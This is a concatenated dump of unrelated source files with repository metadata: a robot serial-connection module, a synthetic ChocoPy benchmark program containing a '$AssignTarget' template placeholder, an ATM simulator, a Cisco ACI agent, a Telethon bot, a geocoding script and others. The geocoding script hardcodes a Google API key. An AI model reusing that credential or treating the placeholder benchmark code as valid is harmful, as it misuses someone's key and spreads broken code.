return apply(struct.pack, tmp)
def _doUnpack(self, connection):
"""
Unpacks arguments read from the connection using regular expressions or
struct.unpack().
"""
if self._regex != None:
return re.match(self._regex, str(connection.read())).groups()
elif self._unpack != None:
sz = struct.calcsize(str(self._unpack))
byteSequence = connection.read(sz)
return struct.unpack(str(self._unpack), byteSequence)
class Connection:
"""
Represents the connection from the host application to the robot.
"""
def __init__(self, name, parent):
"""
Constructs a connection.
"""
## TODO: THREADING
self._name = name
self._parent = parent
self._startup = None
self._keepalive = None
self._terminate = None
self._initialized = False
def startup(self):
"""
Initializes the connection if it is unintialized.
"""
if self._initialized == True: return
self._initialized = True
pass
def tick(self):
"""
Performs any periodic actions needed by this connection.
"""
self.keepalive()
## TODO: Periodic interfaces.
def keepalive(self):
"""
Attempts to call the keepalive if it is past due.
"""
## TODO: obey keepalive frequency
self._callKeepalive()
def _callKeepalive(self):
"""
Calls the keepalive interface.
"""
self._callEventInterface(self._keepalive)
def _callStartup(self):
"""
Calls the startup interface.
"""
self._callEventInterface(self._startup)
def _callTerminate(self):
"""
Calls the termination interface.
"""
self._callEventInterface(self._terminate)
def _callEventInterface(self, i):
"""
Calls a generic eventful interface.
"""
if i == None: return
env = self._parent._buildStateVarEnvironment()
args = safeEvalAll(i['arguments'], env)
self._parent._callInterface(i['name'], args)
def setStartup(self, name, arguments=[]):
"""
Sets the startup interface.
"""
self._startup = {
'name': name,
'arguments': arguments
## TODO: Where is the periodicity?
}
def setTerminate(self, name, arguments=[]):
"""
Sets the terminate interface.
"""
self._terminate = {
'name': name,
'arguments': arguments
}
def setKeepalive(self, name, interval, arguments=[]):
"""
Sets the keepalive interface.
"""
self._keepalive = {
'interval': interval,
'name': name,
'arguments': arguments
}
def write(self, stuff):
"""
Dummy method for writing to an abstract connection. Prints bytes to
stdout.
"""
print "--- WROTE ---"
printBytes(stuff)
def read(self, num):
"""
Dummy method for reading bytes. Returns arbitrary bytes.
"""
print "--- READ ---"
byteSequence = bytes()
for i in range(num):
b = random.randint(0,20)
b = chr(3) if b==0 else chr(0)
byteSequence += b
printBytes(byteSequence)
return byteSequence
class SerialConnection(Connection):
"""
Represents a connection over the serial port.
"""
def __init__(self, baud=9600, name=None, parent=None, singleThreading=None):
Connection.__init__(self, name, parent)
"""
Constructs a serial connection.
"""
self._baud = baud
def startup(self, port='/dev/rfcomm0'):
"""
Opens serial port and calls startup interface.
"""
if self._initialized: return
self._serial = serial.Serial(port=port, baudrate=self._baud)
self._serial.open()
self._initialized = True
self._callStartup()
def terminate(self):
"""
Executes termination interface and closes connection.
"""
self._callTerminate()
self._serial.close()
def write(self, byteSequence):
"""
Writes a byte sequence to the serial port.
"""
self._serial.write(byteSequence)
print "--------- WROTE (serial) ----------"
printBytes(byteSequence)
def read(self, num=1):
"""
Reads a byte sequence from the serial port.
"""
byteSequence = self._serial.read(num)
print "--------- READ (serial) ----------"
printBytes(byteSequence)
return byteSequence
class DomainInterface:
"""
Represents a domain interface.
A domain interface is supposed to be a standardized name and message format
which can pass into the model. It is then normally tied to some local
interface. Domain interfaces have no return values.
"""
def __init__(self,
parent = None,
name=None,
localInterface=None,
interfaceArguments=[],
parameters=[]):
"""
Constructs a domain interface.
A domain interface has some parameters (a set of names) which must be
satisfied by the calling entity. These parameters are then mapped into
arguments that the local interface will accept.
"""
self._parent = parent
self._name = name
self._localInterface = localInterface
self._interfaceArguments = interfaceArguments
self._parameters = parameters
def call(self, givenEnv):
env = dict()
try:
for key in self._parameters:
env[key] = givenEnv[key]
except KeyError as e:
sys.stderr.write("Missing argument for {}: {}\n".format(self._name,str(e)))
return
values = safeEvalAll(self._interfaceArguments,env)
self._parent._callInterface(self._localInterface, values)
class DomainOutput:
def __init__(self,
parent=None,
name=None,
returns=None):
self._parent = parent
self._name = name
self._returns = returns
def call(self):
outMsg = dict(self._returns)
stateVars = self._parent._buildStateVarEnvironment()
for (key, val) in outMsg.items():
outMsg[key] = safeEval(val, stateVars)
self._parent._receiveMessage(self, outMsg)
def getName(self):
return self._name
class Interface:
def __init__(self, parent=None, name=None, type="adhoc", parameters=[],
triggers=None):
self._parent = parent
self._name = name
self._type = type
self._parameters = parameters if parameters != None else []
self._triggers = triggers
self._primitiveCalls = []
def addPrimitiveCall(self, name, arguments, delay=0, priority=0):
self._primitiveCalls.append({
'name': name,
'arguments': arguments,
'delay': delay,
'priority': priority
})
def call(self, arguments):
env = createEnvironment(self._parameters, arguments)
for primCall in sorted(self._primitiveCalls, key=lambda x: x['priority']):
args = safeEvalAll(primCall['arguments'], env)
self._parent._callPrimitive(primCall['name'], args)
time.sleep(primCall['delay'] / 1000.)
if self._triggers != None:
self._parent._callDomainOutput(self._triggers)
|
[
"mahodnett@crimson.ua.edu"
] |
mahodnett@crimson.ua.edu
|
9a3f0834fb8c95c50780b6556f338434afb755ac
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/stdlib-big-2027.py
|
800ffc49d1b9b669601b8019287f65c1ce85377c
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,005
|
py
|
# ChocoPy library functions
def int_to_str(x: int) -> str:
digits:[str] = None
result:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def int_to_str2(x: int, x2: int) -> str:
digits:[str] = None
digits2:[str] = None
result:str = ""
result2:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def int_to_str3(x: int, x2: int, x3: int) -> str:
digits:[str] = None
digits2:[str] = None
digits3:[str] = None
result:str = ""
result2:str = ""
result3:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def int_to_str4(x: int, x2: int, x3: int, x4: int) -> str:
digits:[str] = None
digits2:[str] = None
digits3:[str] = None
digits4:[str] = None
result:str = ""
result2:str = ""
result3:str = ""
result4:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def int_to_str5(x: int, x2: int, x3: int, x4: int, x5: int) -> str:
digits:[str] = None
digits2:[str] = None
digits3:[str] = None
digits4:[str] = None
digits5:[str] = None
result:str = ""
result2:str = ""
result3:str = ""
result4:str = ""
result5:str = ""
# Set-up digit mapping
digits = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
# Write sign if necessary
if x < 0:
result = "-"
x = -x
# Write digits using a recursive call
if x >= 10:
result = result + int_to_str(x // 10)
result = result + digits[x % 10]
return result
def str_to_int(x: str) -> int:
result:int = 0
digit:int = 0
char:str = ""
sign:int = 1
first_char:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
def str_to_int2(x: str, x2: str) -> int:
result:int = 0
result2:int = 0
digit:int = 0
digit2:int = 0
char:str = ""
char2:str = ""
sign:int = 1
sign2:int = 1
first_char:bool = True
first_char2:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
def str_to_int3(x: str, x2: str, x3: str) -> int:
result:int = 0
result2:int = 0
result3:int = 0
digit:int = 0
digit2:int = 0
digit3:int = 0
char:str = ""
char2:str = ""
char3:str = ""
sign:int = 1
sign2:int = 1
sign3:int = 1
first_char:bool = True
first_char2:bool = True
first_char3:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
$AssignTarget 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
def str_to_int4(x: str, x2: str, x3: str, x4: str) -> int:
result:int = 0
result2:int = 0
result3:int = 0
result4:int = 0
digit:int = 0
digit2:int = 0
digit3:int = 0
digit4:int = 0
char:str = ""
char2:str = ""
char3:str = ""
char4:str = ""
sign:int = 1
sign2:int = 1
sign3:int = 1
sign4:int = 1
first_char:bool = True
first_char2:bool = True
first_char3:bool = True
first_char4:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
def str_to_int5(x: str, x2: str, x3: str, x4: str, x5: str) -> int:
result:int = 0
result2:int = 0
result3:int = 0
result4:int = 0
result5:int = 0
digit:int = 0
digit2:int = 0
digit3:int = 0
digit4:int = 0
digit5:int = 0
char:str = ""
char2:str = ""
char3:str = ""
char4:str = ""
char5:str = ""
sign:int = 1
sign2:int = 1
sign3:int = 1
sign4:int = 1
sign5:int = 1
first_char:bool = True
first_char2:bool = True
first_char3:bool = True
first_char4:bool = True
first_char5:bool = True
# Parse digits
for char in x:
if char == "-":
if not first_char:
return 0 # Error
sign = -1
elif char == "0":
digit = 0
elif char == "1":
digit = 1
elif char == "2":
digit = 2
elif char == "3":
digit = 3
elif char == "3":
digit = 3
elif char == "4":
digit = 4
elif char == "5":
digit = 5
elif char == "6":
digit = 6
elif char == "7":
digit = 7
elif char == "8":
digit = 8
elif char == "9":
digit = 9
else:
return 0 # On error
first_char = False
result = result * 10 + digit
# Compute result
return result * sign
# Input parameters
c:int = 42
c2:int = 42
c3:int = 42
c4:int = 42
c5:int = 42
n:int = 10
n2:int = 10
n3:int = 10
n4:int = 10
n5:int = 10
# Run [-nc, nc] with step size c
s:str = ""
s2:str = ""
s3:str = ""
s4:str = ""
s5:str = ""
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
i = -n * c
# Crunch
while i <= n * c:
s = int_to_str(i)
print(s)
i = str_to_int(s) + c
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
ca654d4af8923a06b4bc4ecf85e375843769055d
|
b4dfc245207c58eaf507733968cee3262d63f8e1
|
/Caja.py
|
21c0ba99c2bf920f09c3fc287c64ce68b0dc8e42
|
[] |
no_license
|
nicoadam/atm-python
|
7029df05471febe01d8b48d0fb36b52a1c716652
|
f4fe3f55615e95edef37e706067c9c7a25c11c24
|
refs/heads/main
| 2023-04-14T04:23:13.733255
| 2021-04-25T13:29:30
| 2021-04-25T13:29:30
| 361,435,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,725
|
py
|
import banco
from os import system, path
import time #tiempo del sistema
class Caja(object):
rayas ="*"*100 #rayas
ban = "" # inicializo la variable del objeto banco
def __init__(self):
try:
self.historial = ["****ACCIONES EFECTUADAS****\n"] # titulo de la cabezera del archivo
#path.expanduser me tra el home del usuario
self.archivo = open(path.join(path.expanduser('~'),'Desktop/registro.txt'),'a')
system("clear")
print self.rayas # las rayas
nombre = raw_input("Nombre: ")
cuenta = raw_input("Cuenta: ")
deposito = raw_input("Deposito: ")
self.historial = ["****ACCIONES EFECTUADAS****\n"] # titulo de la cabezera del archivo
self.historial.append("Cliente: " + nombre+'\n') # agregro el cliente la lista del historial
self.historial.append("Cuenta: "+ cuenta+'\n') #agrego la cuenta en la lista
self.historial.append("Deposito Inicial: "+ deposito+'\n\n') # agrego el deposito en la lista
if str(nombre) != "" and str(cuenta) != "" and int(deposito) > 0: #aseguro que dijito datos
# construllo el objeto banco con los valores el cliente
self.ban = banco.Banco(nombre,cuenta,deposito)
#muesto el menu de opciones
self.menu()
else:
print "datos incorrectos dijite datos"
except ValueError:
print "error en los datos \ndigite los datos corecctos"
def menu(self):
print "\n\n\n"
print self.rayas
print "****************Menu de opciones:*********************\n"
try:
opcion = raw_input("QUE DESEA Hacer:\n1-) Consultar Balance\n2-) Comprar Targeta\n3-) Hacer retiro\n4-) Depositar\n5-) Salir\n Elija un numero# ")
if int(opcion) == 1: #consulta de balance
system("clear")
self.Consultar_balance()
self.transaccion('Consulta')
self.menu()
elif int(opcion) == 2: #compra de targeta
system("clear")
self.comprar_targeta(raw_input("cantida de recarga $..... ")) # metodo comprar_targeta
self.transaccion('Compra')
self.menu()
elif int(opcion) == 3: #retiro
system("clear")
self.hacer_retiro(raw_input("**#Cantidad de retiro $..... ")) #metodo hacer retiro
self.transaccion('Retiro')
self.menu()
elif int(opcion) == 4: #deposito
system("clear")
self.hacer_deposito(raw_input('$Cantidad a depositar\n.....')) #metodo hacer_reposito
self.transaccion('Deposito')
self.menu()
elif int(opcion) == 5: #salir del programa
for reg in self.historial:
self.archivo.writelines(reg) #recuperando el listado de la lista historial
self.archivo.flush()
self.archivo.close()
print "bye"
exit()
else:
system("clear")
print "ELIJA UNA DE LAS OPCIONES\n\n"
self.menu()
except ValueError:
print "Error Elija solo numeros"
self.menu()
def Consultar_balance(self):
try:
if self.ban.getMonto() > 0: # vefirica si el monto que 0 , si tiene balance
print("**SU BALANCE ES DE $ " + str(self.ban.getMonto()) +" RD")
except Exception, e:
print ("error: " + str(e))
def comprar_targeta(self,dinero):
try:
if int(dinero) > 0: # verifica que entras dinero
self.ban.targeta(dinero) # el banco hace la transaccion
except Exception, e:
print ("error" + str(e))
def hacer_retiro(self,dinero):
try:
self.ban.retiro(dinero) # llama funcion retiro de BANCO
except Exception, e:
print "error: " + str(e)
def hacer_deposito(self,dinero):
try:
self.ban.depositar(dinero)
except Exception, e:
print "error: " + str(e)
def transaccion(self,accion):
try:
self.historial.append(str(accion)+' a las '+str(time.ctime(time.time())) + "\n") # ctime convierte a string los segundo que viene de time()
except Exception, e:
print "error: " + str(e)
self.archivo.close()
ca =Caja()
|
[
"edgar1391@gmail.com"
] |
edgar1391@gmail.com
|
9bf056a7cf20339db644c6a71488458cca6aa0c0
|
b9e64241fb706cbee4523275bbfc3cbf339d4014
|
/hostagent.py
|
c1948e9963ec3b55b54eccc0f05a6d8d26df93c3
|
[] |
no_license
|
kecorbin/apicserviceagent
|
89e535b557367bdc20098c5c4371576e39bc4344
|
f101a384d50a9b7747f676b976d827db7041b7e2
|
refs/heads/master
| 2021-01-19T07:58:33.088437
| 2014-12-07T20:49:37
| 2014-12-07T20:49:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,523
|
py
|
#!/usr/bin/env python
import cobra.mit.access
import cobra.mit.session
import cobra.mit.request
import cobra.model.fv
from cobra.mit.request import DnQuery, ClassQuery
class Agent:
def __init__(self, host, user, passwd):
self.host = host
self.user = user
self.passwd = passwd
self.ls = cobra.mit.session.LoginSession(self.host, self.user, self.passwd)
self.md = cobra.mit.access.MoDirectory(self.ls)
self.md.login()
def list_services(self):
services_list = []
for service in self.md.lookupByClass('vzBrCP'):
services_list.append(str(service.dn))
return services_list
def endpointbyip(self, ip):
"""
:param ip: sstring IP address
:return: fvCEp object
"""
c = ClassQuery('fvCEp')
c.propFilter = 'and(eq(fvCEp.ip, "%s"))' % ip
dn = self.md.query(c)
if len(dn) > 1:
raise ValueError('More than one CEP with IP address')
else:
return dn[0].dn
def ip_provides(self, ip):
"""
:param ip:
:return:
"""
mydn = self.endpointbyip(ip)
myparent = self.md.lookupByDn(mydn).parentDn
myprovidedsvcs = self.epg_provides(myparent)
return myprovidedsvcs
def ip_consumes(self, ip):
"""
:param ip: string IP address
:return: list of string dn's
"""
mydn = self.endpointbyip(ip)
myparent = self.md.lookupByDn(mydn).parentDn
myprovidedsvcs = self.epg_consumes(myparent)
return myprovidedsvcs
def whoisproviding(self, servicedn):
"""
:param servicedn:
:return:
"""
providers = self.md.lookupByClass('fvRsProv', propFilter='and(eq(fvRsProv.tDn,"%s""))' % servicedn)
provider_list = []
for provider in providers:
provider_list.append(str(provider.parentDn))
return provider_list
def whoisconsuming(self, servicedn):
"""
Returns a
:param servicedn:
:return:
"""
consumers = self.md.lookupByClass('fvRsCons', propFilter='and(eq(fvRsCons.tDn,"%s""))' % servicedn)
consumer_list = []
for consumer in consumers:
consumer_list.append(str(consumer))
return consumer_list
def epg_provides(self, epg):
q = DnQuery(epg)
q.queryTarget = 'children'
q.subtree = 'full'
q.classFilter = 'fvRsProv'
children = self.md.query(q)
provided = []
for contract in children:
provided.append(contract.tDn)
return provided
def epg_consumes(self, epg):
q = DnQuery(epg)
q.queryTarget = 'children'
q.subtree = 'full'
q.classFilter = 'fvRsCons'
children = self.md.query(q)
consumedsvcs = []
for contract in children:
consumedsvcs.append(contract.tDn)
return consumedsvcs
def epg_endpoints(self, epg):
q = DnQuery(epg)
q.queryTarget = 'children'
q.subtree = 'full'
q.classFilter = 'fvCEp'
children = self.md.query(q)
endpoints = []
for ep in children:
endpoints.append(ep.ip)
return endpoints
def consumeservice(self, dn, contractdn, svcflag):
"""
:param dn: dn of epg
:param contractdn: dn of contract
:param svcflag: boolean add/delete fvRsCons
:return:
"""
epg, contract = self.md.lookupByDn(dn), self.md.lookupByDn(contractdn)
if svcflag:
fvrscons = cobra.model.fv.RsCons(epg, tnVzBrCPName=contract.name)
else:
fvrscons = cobra.model.fv.RsCons(epg, tnVzBrCPName=contract.name).delete()
c1 = cobra.mit.request.ConfigRequest()
c1.addMo(epg)
self.md.commit(c1)
return fvrscons
def provideservice(self, dn, contractdn, svcflag):
"""
:param dn: dn of epg
:param contractdn: dn of contract
:param svcflag: boolean add/delete fvRsProv
:return:
"""
epg, contract = self.md.lookupByDn(dn), self.md.lookupByDn(contractdn)
if svcflag:
fvrsprov = cobra.model.fv.RsProv(epg, tnVzBrCPName=contract.name)
else:
fvrsprov = cobra.model.fv.RsProv(epg, tnVzBrCPName=contract.name).delete()
c1 = cobra.mit.request.ConfigRequest()
c1.addMo(epg)
self.md.commit(c1)
return fvrsprov
|
[
"kecorbin@cisco.com"
] |
kecorbin@cisco.com
|
b69c8df05efb1c946c2379bbb3a7cbafc5a010d9
|
72a934f4940c4ae77682d45a2d1e8ec5b1e2ff01
|
/venv/Scripts/pip3.8-script.py
|
f2b389e665b291cb3dc3f058d36bb6b6941f01e1
|
[] |
no_license
|
dhaval-jain/g1
|
5347160fcf4efc21207fdf9f996a10dd4e0f61e9
|
a6d4deb672204b9eaf1efc5c6e0c12f38b5bb906
|
refs/heads/master
| 2023-03-18T22:49:03.559327
| 2020-11-17T16:59:50
| 2020-11-17T16:59:50
| 346,329,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
#!C:\Users\meow\PycharmProjects\project1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
|
[
"inexorable619@gmail.com"
] |
inexorable619@gmail.com
|
c65e687f2a60aec60f86c88a817f06b916bede1a
|
2c5b8e18262c3db5fadf30a692a525224479c1ec
|
/medium_config.py
|
3e269c2792d2f714245da3a066f127434d672152
|
[] |
no_license
|
psaletan/hugo2medium
|
bb2c011eaf72a53299dfcd884720d95cfb262f9c
|
e194af6c74decd60d896f86add53d16e21a26f12
|
refs/heads/master
| 2020-03-08T21:31:54.633665
| 2018-04-06T14:52:23
| 2018-04-06T14:52:23
| 128,408,235
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
"""medium_config.py
configuration for publishing a Hugo post to Medium
"""
# Medium settings
MEDIUM_USERNAME = "paul.saletan"
MEDIUM_PUBLISH_URL = "https://medium.com"
DEFAULT_TITLE = "My Title"
PUBLISH_STATUS = "draft"
# Hugo settings
# Where markdown files are located
DEFAULT_LOCAL_DIRECTORY = '/home/paul/site/hugo/tech/content/posts'
# For providing a link/attribution to the original Hugo post
INCLUDE_ATTRIBUTION = True
ORIGINAL_DOMAIN_NAME = "tech.surveypoint.com"
ORIGINAL_DOMAIN_URL = "https://tech.surveypoint.com"
ORIGINAL_DOMAIN_DIRECTORY = "posts"
ATTRIBUTION_TEMPLATE = "Originally published at [" + ORIGINAL_DOMAIN_NAME \
+ "](" + ORIGINAL_DOMAIN_URL + "/" + ORIGINAL_DOMAIN_DIRECTORY \
+ "/" + "$$POST_LINK$$/) on $$POST_DATE$$."
# Translation table: removes certain characters from Hugo tags
META_TRANS_TABLE = str.maketrans(dict.fromkeys(' "[]'))
IGNORE_LINES_CONTAINING = [ '<img ', '"caption"' ]
|
[
"psaletan@gmail.com"
] |
psaletan@gmail.com
|
b0fda62c91e2ef2f82de42bc419511c8207e287d
|
a2dbf96b1fc3329a296b9f338b94bac9b880d85c
|
/call_api.py
|
6a0a19d647923ae367a3e41151000a56bdd8fb22
|
[] |
no_license
|
shishirmax/py
|
830894e4ca48d5e3e3eb732e64e36d1cc9f2658a
|
3eaa8564f4532c460d78162d965d7905d7840918
|
refs/heads/master
| 2022-02-28T09:10:05.269671
| 2019-10-14T11:20:26
| 2019-10-14T11:20:26
| 109,232,985
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
import requests
import json
api_key = "AIzaSyBEQyAbIVXfGTSbLr_S-HUpSZoxfoBbc5I"
strAdd = "0 State Highway 99"
strCity = " Montgomery Twp"
strState = " "
strZip = "56069"
complete_address = strAdd+strCity+strState+strZip
url = "https://maps.googleapis.com/maps/api/geocode/json?address="+complete_address+"&key=AIzaSyBEQyAbIVXfGTSbLr_S-HUpSZoxfoBbc5I"
api_response = requests.get(url)
api_response.status_code
api_response.headers['content-type']
api_response.encoding
api_response.json()
json_r = api_response.json()
json_str = json.dumps(json_r)
parsed_json = json.loads(json_str)
print("Original Address: ",complete_address)
#this gives the formatted address
print("Formatted Address: ",parsed_json['results'][0]['formatted_address'])
#this gives the latitude
print("Latitude: ",parsed_json['results'][0]['geometry']['location']['lat'])
#this gives the longitude
print("Longitude: ",parsed_json['results'][0]['geometry']['location']['lng'])
|
[
"shishirmax@gmail.com"
] |
shishirmax@gmail.com
|
652e5faa14374b2c8acb1e848e42cfc2a960f2ff
|
78e1b2b293acca855508cbe69ade1c530fa4b676
|
/06_with_logging.py
|
9dcc41fc213610c0fcb0f485ca1a9e908bf05735
|
[] |
no_license
|
mfonism/learn-telethon
|
c9597d3a20e0e12db7c0165c6a122a8f44933fc6
|
6eb49e20df33e4a668f225212f8945475b316822
|
refs/heads/master
| 2022-12-13T15:33:20.561060
| 2020-02-11T14:05:22
| 2020-02-11T14:05:22
| 239,226,974
| 0
| 0
| null | 2022-11-22T05:18:05
| 2020-02-09T00:58:13
|
Python
|
UTF-8
|
Python
| false
| false
| 476
|
py
|
import logging
from telethon import TelegramClient, events
import settings
logging.basicConfig(
format="[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s", level=logging.WARNING
)
client = TelegramClient(
settings.USER_SESSION_FILENAME, settings.API_ID, settings.API_HASH
)
@client.on(events.NewMessage)
async def my_event_handler(event):
if "Kiwi" in event.raw_text:
await event.reply("Yas, boo!")
client.start()
client.run_until_disconnected()
|
[
"mfonetimfon@gmail.com"
] |
mfonetimfon@gmail.com
|
f408c17757ab32b3fb0706b8702baaa29e7c3158
|
dec67195d506a847ff876deb0d33972f18170b5a
|
/coroutine_asyncio_serv.py
|
5f45978297c19e9790ac24d64a0dcbca6a36cf89
|
[] |
no_license
|
madomdy/simple_servers
|
dc1f4e433684ea20c9a44b48cd1a3e9fedb234d7
|
83edfd9fb8f540d64787a41e21e77cba5c5ec367
|
refs/heads/master
| 2020-07-15T10:23:46.243124
| 2016-12-28T17:30:48
| 2016-12-28T17:30:48
| 73,964,545
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,089
|
py
|
import asyncio, zen_utils
@asyncio.coroutine
def handle_conversation(reader, writer):
address = writer.get_extra_info('peername')
print('Accepted connection from {}'.format(address))
while True:
data = b''
while not data.endswith(b'?'):
more_data = yield from reader.read(4096)
if not more_data:
if data:
print('Client {} sent {!r} but then closed'.
format(address, data))
else:
print('Client {} closed socket normally'.format(address))
return
data += more_data
answer = zen_utils.get_answer(data)
writer.write(answer)
if __name__ == '__main__':
address = zen_utils.parse_command_line('asyncio using coroutine')
loop = asyncio.get_event_loop()
coro = asyncio.start_server(handle_conversation, *address)
server = loop.run_until_complete(coro)
print('Listening at {}'.format(address))
try:
loop.run_forever()
finally:
server.close()
loop.close()
|
[
"omar.shikhkerimov@gmail.com"
] |
omar.shikhkerimov@gmail.com
|
f17d81c395fa825f2af97515f5e18aa4f402bc20
|
d7787de97e8969244c5179f253422adc20139ecc
|
/pystim/io/csv.py
|
2f51220754a4b304cc6f45636d4742662a874015
|
[
"MIT"
] |
permissive
|
balefebvre/pystim
|
1a731fab9efdcd72ba627f598a4c62dea13c6b36
|
ae51d8a4b478da6dec44b296407099c6257fa3fa
|
refs/heads/master
| 2021-06-30T07:56:12.652247
| 2019-05-23T15:42:25
| 2019-05-23T15:42:25
| 156,358,798
| 0
| 0
|
MIT
| 2019-05-23T15:42:27
| 2018-11-06T09:28:44
|
Python
|
UTF-8
|
Python
| false
| false
| 924
|
py
|
import pandas as pd
def open_file(path, columns=[], dtype=None):
file = CSVFile(path, columns=columns, dtype=dtype)
return file
def load_file(path, expected_columns=None):
dataframe = pd.read_csv(path, index_col=0)
if expected_columns is not None:
columns = dataframe.columns.values.tolist()
for expected_column in expected_columns:
assert expected_column in columns, "column '{}' missing in file://{}".format(expected_column, path)
return dataframe
class CSVFile:
def __init__(self, path, columns=[], dtype=None):
self._path = path
self._columns = columns
self._dtype = dtype
self._list = []
def append(self, **kwargs):
self._list.append(kwargs)
return
def close(self):
df = pd.DataFrame(self._list, columns=self._columns, dtype=self._dtype)
df.to_csv(self._path)
return
|
[
"baptiste.lefebvre@ens.fr"
] |
baptiste.lefebvre@ens.fr
|
6c4c40c1e83ecbc68e98234bc754804fb4a8a163
|
5cbd3da4febb37170663f9a76441c6d0e78c54fd
|
/src/programmerslevel2/제이든문자열.py
|
03d812012efa20b0f88bc572a2eb6bbacbf28b1f
|
[] |
no_license
|
knae11/pythonAlgorithm
|
fb07dc73e0c6de9a6da2f169d961148ebc74d54c
|
5a17aae336028628711a9067e31b820ab0ceeb4a
|
refs/heads/main
| 2023-08-22T05:31:06.463927
| 2021-10-08T05:00:53
| 2021-10-08T05:00:53
| 335,243,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
def solution(s):
answer = ''
process = ''
s += " "
for letter in s:
if letter == " ":
converted = process.capitalize()
answer += converted
process = ''
answer += " "
else:
process += letter
return answer[:-1]
print(solution("3people unFollowed me"))
|
[
"knae11@naver.com"
] |
knae11@naver.com
|
75ca2a91168b539408982c9268062e6b786bbdc9
|
68a5852042c54d6f5b8f6fef3261f4cda9984eda
|
/Decision_Tree/DT_main.py
|
b51ad9e0413ddca4dd3ce5ff29cb4012dfae6889
|
[] |
no_license
|
Qu-Xiangjun/MachineLearning_Zhouzhihua_MyModleCode
|
c95d6c15782e4f8148709ee0274ab1e1232a4261
|
52a02d8c121525a1075ed42b857ebf602ee497d3
|
refs/heads/main
| 2023-02-01T09:49:19.830283
| 2020-12-10T10:25:11
| 2020-12-10T10:25:11
| 320,230,500
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,447
|
py
|
"""
@time: 2020-10-15
@author: Qu Xiangjun 20186471
@describe: 测试自定义的决策树分类算法对西瓜数据集2.0(周志华《机器学习》)二分类
"""
import pandas as pd
import json
from Decision_Tree import Create_Decision_Tree, StoreTree,ReadTree,dtClassify
from draw_decision_tree import create_plot
def load_dataset():
"""
从asv表格导入数据
@return x 训练数据 shape=[6,17] ,
y 训练数据的结果 shape =[1,17],
